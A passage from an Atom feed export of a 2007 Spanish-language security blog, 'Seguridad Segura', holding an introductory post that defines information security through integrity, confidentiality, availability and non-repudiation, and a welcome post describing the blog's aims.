&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-7663586511235477636?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/7663586511235477636/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=7663586511235477636&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/7663586511235477636'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/7663586511235477636'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/11/importancia-de-las-fallas-informticas.html' title='Importancia de las Fallas Informáticas'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-4038019319785175821</id><published>2007-11-23T01:45:00.000-03:00</published><updated>2007-11-23T01:53:58.359-03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Conceptos / Definiciones'/><title type='text'>Seguridad - Introducción</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.mw.com.ar/imagenes/networksecurity.jpg"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 138px; height: 195px;" src="http://www.mw.com.ar/imagenes/networksecurity.jpg" alt="" border="0" /&gt;&lt;/a&gt;Podemos entender como &lt;span style="font-weight: bold;"&gt;Seguridad&lt;/span&gt; un estado de cualquier sistema (informático o no) que nos indica que ese sistema está libre de &lt;span style="font-style: italic;"&gt;peligro&lt;/span&gt;, &lt;span style="font-style: italic;"&gt;daño&lt;/span&gt; o &lt;span style="font-style: italic;"&gt;riesgo&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;Se entiende como peligro o daño todo aquello que pueda afectar su funcionamiento directo o los resultados que se obtienen del mismo. Para la mayoría de los expertos del tema el concepto de seguridad en la informática es utópico porque &lt;span style="font-weight: bold;"&gt;NO&lt;/span&gt; existe un sistema 100% seguro y de eso seguramente trataremos más adelante.&lt;br /&gt;&lt;br /&gt;Para que un sistema se pueda definir como seguro debemos de dotar de cuatro características al mismo:&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-weight: bold;"&gt;Integridad&lt;/span&gt;: La información no puede ser modificada por quien no está autorizado&lt;/li&gt;&lt;li&gt;    &lt;span style="font-weight: bold;"&gt;Confidencialidad&lt;/span&gt;: La información solo debe ser legible para los autorizados&lt;/li&gt;&lt;li&gt;    &lt;span style="font-weight: bold;"&gt;Disponibilidad&lt;/span&gt;: Debe estar disponible cuando se necesita&lt;/li&gt;&lt;li&gt;    &lt;span style="font-weight: bold;"&gt;Irrefutabilidad&lt;/span&gt;: (No-Rechazo o No Repudio) Que no se pueda negar la autoría.&lt;/li&gt;&lt;/ul&gt;&lt;blockquote&gt;En estos momentos la Seguridad Informática es un tema de dominio obligado por cualquier usuario de la Internet y de los sistemas informáticos, para no permitir que su información sea robada y usada sin autorización.&lt;/blockquote&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-4038019319785175821?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/4038019319785175821/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=4038019319785175821&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/4038019319785175821'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/4038019319785175821'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/11/seguridad-introduccin.html' title='Seguridad - Introducción'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-321546442820364266</id><published>2007-11-23T01:08:00.000-03:00</published><updated>2008-12-10T12:34:01.038-02:00</updated><title type='text'>Seguridad Segura</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_QbjL4lTr2UU/R0ZUju-FBWI/AAAAAAAAAKc/y2hPdMvOHzw/s1600-h/file_locked.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://4.bp.blogspot.com/_QbjL4lTr2UU/R0ZUju-FBWI/AAAAAAAAAKc/y2hPdMvOHzw/s320/file_locked.png" alt="" id="BLOGGER_PHOTO_ID_5135885397943190882" border="0" /&gt;&lt;/a&gt;Antes que nada queríamos darle una bienvenida a todos ustedes! Les comentamos básicamente de que se trata este nuevo &lt;span style="font-weight: bold;"&gt;Blog&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;Junto a un amigo &lt;span style="font-weight: bold;"&gt;Gustavo&lt;/span&gt; (&lt;span style="font-style: italic;"&gt;Barnisimo&lt;/span&gt;) desde hace tiempo ya veníamos pensando en algunos proyectos acerca de &lt;span style="font-weight: bold;"&gt;Seguridad Informática&lt;/span&gt;, tratando de cubrir varios aspecto referente a este tema, ir mostrando conceptos, prácticas realizadas, amenazas que pueden llegar a sufrir nuestros sistemas y organizaciones.&lt;br /&gt;&lt;br /&gt;En fin, el objetivo nuestro es brindarle de alguna forma un lugar y un espacio en donde podamos aprender y entender muchas de las cuestiones de Seguridad Informática de las que hasta el día de hoy no conocemos.&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;A partir de ahora Barnisimo y yo (Danyx) les damos las bienvenidas y ojalá podamos formar un gran equipo de conocimiento junto a todos ustedes.&lt;/blockquote&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-321546442820364266?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/321546442820364266/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=321546442820364266&amp;isPopup=true' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/321546442820364266'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/321546442820364266'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/11/seguridad-segura.html' title='Seguridad Segura'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_QbjL4lTr2UU/R0ZUju-FBWI/AAAAAAAAAKc/y2hPdMvOHzw/s72-c/file_locked.png' height='72' width='72'/><thr:total>1</thr:total></entry></feed>
